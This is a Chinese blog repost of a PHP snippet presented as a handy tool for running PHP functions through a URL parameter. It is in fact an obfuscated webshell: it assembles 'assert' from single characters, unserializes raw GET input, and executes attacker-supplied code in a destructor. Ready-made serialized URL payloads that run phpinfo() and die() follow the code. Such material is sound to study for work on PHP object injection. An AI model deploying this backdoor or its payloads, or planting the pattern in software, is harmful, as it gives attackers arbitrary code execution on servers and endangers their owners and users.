zoukankan      html  css  js  c++  java
  • 群里一个高手写的url?传参执行php函数的小程序, 收藏下

    <?php
    // +----------------------------------------------------------------------
    // | Copyright (c) 2006-2012 KingBin All rights reserved.
    // +----------------------------------------------------------------------
    // | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
    // +----------------------------------------------------------------------
    // | Author: KingBin 1055692563@qq.com
    // +----------------------------------------------------------------------
    error_reporting(0);
    class test
    {
        public $fn=array('a','s','s','e','r','t');
        public $str;
        
        function __destruct()
        {
           $r =  join(null,$this->fn);
           return $r($this->str);
        }
    }
    
    if($_GET['url']) unserialize($_GET['url']) && die();
    
    show_source(__FILE__);
    
    
    ?>

    所以 只要我们提交一个
    $o=new test; $o->str='phpinfo()'; 那么是不是就会起到执行phpinfo呢? 所以转换一下  xx.php?url=O:4:"test":1:{s:3:"str";s:9:"phpinfo()";} 就会执行了  这个类~~~~
    ?url=O:4:%22test%22:2:{s:2:%22fn%22;a:6:{i:0;s:1:%22a%22;i:1;s:1:%22s%22;i:2;s:1:%22s%22;i:3;s:1:%22e%22;i:4;s:1:%22r%22;i:5;s:1:%22t%22;}s:3:%22str%22;s:18:%22die('heelo%20world')%22;}
  • 相关阅读:
    java 数组
    数组(二)
    JVM内存分配策略
    JVM垃圾收集算法
    LINUX 查看硬件配置命令
    遗传算法
    svn简单使用
    Several concepts in Data Mining
    JVM判断对象存活的算法
    JVM运行时数据区
  • 原文地址:https://www.cnblogs.com/freespider/p/3382127.html
Copyright © 2011-2022 走看看